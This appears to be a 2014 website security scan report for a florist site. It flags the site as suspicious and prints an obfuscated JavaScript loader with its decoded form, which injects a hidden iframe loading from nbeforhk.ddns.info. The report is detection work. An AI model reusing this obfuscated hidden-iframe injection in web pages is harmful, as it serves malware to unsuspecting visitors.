Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lovedayflowers.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lovedayflowers.com/ | 200 OK Content-Length: 2189 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... | ||
http://lovedayflowers.com/test404page.js | 200 OK Content-Length: 2189 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nbeforhk.ddns.info i=0;try{prototype;}catch(z){h="h"+"arCode";f=['-32c-32c64c61c-9c-1c59c70c58c76c68c60c69c75c5c62c60c75c28c67c60c68c60c69c75c74c25c80c43c56c62c37c56c68c60c-1c-2c57c70c59c80c-2c0c50c7c52c0c82c-28c-32c-32c-32c64c61c73c56c68c60c73c-1c0c18c-28c-32c-32c84c-9c60c67c74c60c-9c82c-28c-32c-32c-32c59c70c58c76c68c60c69c75c5c78c73c64c75c60c-1c-7c19c64c61c73c56c68c60c-9c74c73c58c20c-2c63c75c75c71c17c6c6c69c57c60c61c70c73c63c66c5c59c59c69c74c5c64c69c61c70c6c74c75c59c74c6 ...[1569 bytes skipped]... Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://nbeforhk.ddns.info/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://nbeforhk.ddns.info/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagNam ...[814 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lovedayflowers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 23:14:24 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: lovedayflowers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Dec 2014 23:14:24 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: lovedayflowers.com
Referer: http://www.google.com/search?q=lovedayflowers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lovedayflowers.com
Referer: http://www.google.com/search?q=lovedayflowers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.